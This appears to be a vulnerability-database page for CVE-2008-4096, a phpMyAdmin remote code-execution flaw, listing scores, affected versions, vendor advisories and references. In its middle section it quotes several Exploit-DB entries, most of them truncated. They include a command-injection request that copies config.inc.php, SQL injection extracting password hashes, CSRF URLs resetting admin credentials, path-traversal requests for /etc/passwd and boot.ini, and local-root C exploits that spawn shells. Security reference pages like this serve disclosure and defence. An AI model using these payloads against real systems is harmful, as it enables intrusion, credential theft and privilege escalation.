CVE-2008-4096
published 2008-09-18CVE-2008-4096: libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to…
PriorityP356high8.5CVSS 2.0
AVNACMAuSCCICAC
EXPLOIT
EPSS
11.18%
95.4th percentile
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < phpmyadmin 4:2.11.8.1-2 (bookworm) | phpmyadmin 4:2.11.8.1-2 (bookworm) |
| phpmyadmin | phpmyadmin | <= 2.11.9 | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
CVSS provenance
nvdv2.08.5HIGHAV:N/AC:M/Au:S/C:C/I:C/A:C
osv8.5HIGH
vendor_debian8.5MEDIUM
vendor_redhat8.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2008-4096: phpmyadmin - libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote...
vendor_debian·2008·CVSS 8.5
CVE-2008-4096 [HIGH] CVE-2008-4096: phpmyadmin - libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote...
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
Scope: local
bookworm: resolved (fixed in 4:2.11.8.1-2)
bullseye: resolved (fixed in 4:2.11.8.1-2)
forky: resolved (fixed in 4:2.11.8.1-2)
sid: resolved (fixed in 4:2.11.8.1-2)
trixie: resolved (fixed in 4:2.11.8.1-2)
Red Hat
phpMyAdmin: Code execution vulnerability (< 2.11.9.1)
vendor_redhat·CVSS 8.5
CVE-2008-4096 [HIGH] phpMyAdmin: Code execution vulnerability (< 2.11.9.1)
phpMyAdmin: Code execution vulnerability (< 2.11.9.1)
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
GHSA
GHSA-j99q-43xw-28f9: libraries/database_interface
ghsa_unreviewed·2022-05-02
CVE-2008-4096 [HIGH] CWE-20 GHSA-j99q-43xw-28f9: libraries/database_interface
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
OSV
CVE-2008-4096: libraries/database_interface
osv·2008-09-18·CVSS 8.5
CVE-2008-4096 [HIGH] CVE-2008-4096: libraries/database_interface
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
No detection rules found.
Exploit-DB
Synchronet BBS 3.16c - Denial of Service
exploitdb·2017-02-28·CVSS 7.5
CVE-2017-6371 [HIGH] Synchronet BBS 3.16c - Denial of Service
Synchronet BBS 3.16c - Denial of Service
---
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6371
import socket
import time
import sys
try:
host = sys.argv[1]
port = 80
except IndexError:
print "[+] Usage %s " % sys.argv[0]
sys.exit()
exploit = "\x41"*4096
buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml
Exploit-DB
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
exploitdb·2008-10-27
CVE-2008-4210 Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
Linux Kernel
bug information:
http://osvdb.org/49081
!!!This is for educational purposes only!!!
To use it, you've got to find a sgid directory you've got
permissions to write into (obviously world-writable), e.g:
find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
which fortunately is not common those days :)
And also a shell that does not drop sgid privs upon execution (like ash/sash).
E.g:
test:/fileserver/samba$ ls -ld
drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
test:/fileserver/samba$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
test:/fileserver/samba$ /tmp/gw-ftrex
ash shell found!
size=80200
We're evil evil evil!
$ id
uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)
Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se
Exploit-DB
CYASK 3.x - 'neturl' Local File Disclosure
exploitdb·2008-09-18
CVE-2008-4151 CYASK 3.x - 'neturl' Local File Disclosure
CYASK 3.x - 'neturl' Local File Disclosure
---
This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.
The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass
the user check and then submit any filename to $neturl so that collect.php can read it.
The vuln code like this:
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=empty($neturl) ? $url : $neturl;
$contents = '';
if($fid=@fopen($collect_url,"r"))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
POC:
http://XXX.com/collect.php?neturl=../../../etc/passwd
# milw0rm.com [2008-09-18]
Exploit-DB
phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution
exploitdb·2008-09-15
CVE-2008-4096 phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution
phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution
---
source: https://www.securityfocus.com/bid/31188/info
phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects versions prior to phpMyAdmin 2.11.9.1.
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Exploit-DB
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
exploitdb·2008-05-10
CVE-2008-5208 Joomla! Component Datsogallery 1.6 - Blind SQL Injection
Joomla! Component Datsogallery 1.6 - Blind SQL Injection
---
\n");
fwrite($fs, $req);
$res=fread($fs, 4096);
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $norm_ua;
global $where;
$xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
return $xpl;
}
//main
echo 'Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\nusername&pic_id - optional\n");
send_xpl($url, $norm_ua);
//get md5
for($i=0;$i58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_
Exploit-DB
μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
exploitdb·2008-04-18
CVE-2008-6586 μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
---
source: https://www.securityfocus.com/bid/28847/info
uTorrent WebUI is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application.
uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected.
To force a file download:
http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
To change administrative credentials and settings:
http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://w
Exploit-DB
SCO UnixWare Merge - 'mcd' Local Privilege Escalation
exploitdb·2008-04-04
CVE-2008-6559 SCO UnixWare Merge - 'mcd' Local Privilege Escalation
SCO UnixWare Merge - 'mcd' Local Privilege Escalation
---
/* 04/2008: public release
* I have'nt seen any advisory on this; possibly still not fixed.
*
* SCO UnixWare Merge mcd Local Root Exploit
* By qaaz
*/
#include
#include
#include
#include
#include
#include
#define TARGET "/usr/lib/merge/mcd"
#define DIR "/proc/%d/object", getpid()
#define BIN "a.out"
#define LNK "hrc;" BIN ";prc"
#define DEV "/dev/cdrom/cdrom1"
int main(int argc, char *argv[])
{
char dir[4096], bin[4096];
char dev[4096], env[4096];
pid_t child;
struct stat st;
if (geteuid() == 0) {
setuid(geteuid());
setgid(getegid());
if (strstr(argv[0], BIN)) {
umask(0);
chown(BIN, 0, 3);
chmod(BIN, 06777);
kill(getppid(), 15);
return 0;
}
putenv("HISTFILE=/dev/null");
execl("/bin/sh", "sh", "-i", NULL);
printf("[-] sh: %s\n",
Exploit-DB
SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
exploitdb·2008-04-04
CVE-2008-6558 SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
---
/* 04/2008: public release
* I have'nt seen any advisory on this; possibly still not fixed.
*
* SCO UnixWare Reliant HA Local Root Exploit
* By qaaz
*/
#include
#include
#include
#include
#include
#include
#define TGT1 "/usr/opt/reliant/bin/hvdisp"
#define TGT2 "/usr/opt/reliant/bin/rcvm"
#define DIR "bin"
#define BIN DIR "/hvenv"
int main(int argc, char *argv[])
{
char self[4096], *target;
pid_t child;
if (geteuid() == 0) {
setuid(geteuid());
dup2(3, 0);
dup2(4, 1);
dup2(5, 2);
if ((child = fork()) == 0) {
putenv("HISTFILE=/dev/null");
execl("/bin/sh", "sh", "-i", NULL);
printf("[-] sh: %s\n", strerror(errno));
} else if (child != -1)
waitpid(child, NULL, 0);
kill(getppid(), 15);
return 1;
}
printf("---------------------
Exploit-DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb·2008-03-03
CVE-2007-0919 MiniWebsvr 0.0.9a - Remote Directory Traversal
MiniWebsvr 0.0.9a - Remote Directory Traversal
---
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]
No writeups or analysis indexed.
http://fd.the-wildcat.de/pma_e36a091q11.phphttp://lists.opensuse.org/opensuse-security-announce/2009-02/msg00000.htmlhttp://osvdb.org/48196http://secunia.com/advisories/31884http://secunia.com/advisories/31918http://secunia.com/advisories/32034http://secunia.com/advisories/33822http://security.gentoo.org/glsa/glsa-200903-32.xmlhttp://typo3.org/teams/security/security-bulletins/typo3-20080916-1/http://www.debian.org/security/2008/dsa-1641http://www.mandriva.com/security/advisories?name=MDVSA-2008:202http://www.nabble.com/phpMyAdmin-2.11.9.1-is-released-td19497113.htmlhttp://www.openwall.com/lists/oss-security/2008/09/15/2http://www.openwall.com/lists/oss-security/2008/09/16/2http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7http://www.securityfocus.com/bid/31188http://www.vupen.com/english/advisories/2008/2585http://www.vupen.com/english/advisories/2008/2619https://bugzilla.redhat.com/show_bug.cgi?id=462430https://exchange.xforce.ibmcloud.com/vulnerabilities/45157https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01137.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01155.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01228.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01290.htmlhttp://fd.the-wildcat.de/pma_e36a091q11.phphttp://lists.opensuse.org/opensuse-security-announce/2009-02/msg00000.htmlhttp://osvdb.org/48196http://secunia.com/advisories/31884http://secunia.com/advisories/31918http://secunia.com/advisories/32034http://secunia.com/advisories/33822http://security.gentoo.org/glsa/glsa-200903-32.xmlhttp://typo3.org/teams/security/security-bulletins/typo3-20080916-1/http://www.debian.org/security/2008/dsa-1641http://www.mandriva.com/security/advisories?name=MDVSA-2008:202http://www.nabble.com/phpMyAdmin-2.11.9.1-is-released-td19497113.htmlhttp://www.openwall.com/lists/oss-security/2008/09/15/2http://www.openwall.com/lists/oss-security/2008/09/16/2http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7http://www.securityfocus.com/bid/31188http://www.vupen.com/english/advisories/2008/2585http://www.vupen.com/english/advisories/2008/2619https://bugzilla.redhat.com/show_bug.cgi?id=462430https://exchange.xforce.ibmcloud.com/vulnerabilities/45157https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01137.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01155.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01228.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-September/msg01290.html
2008-09-18
Published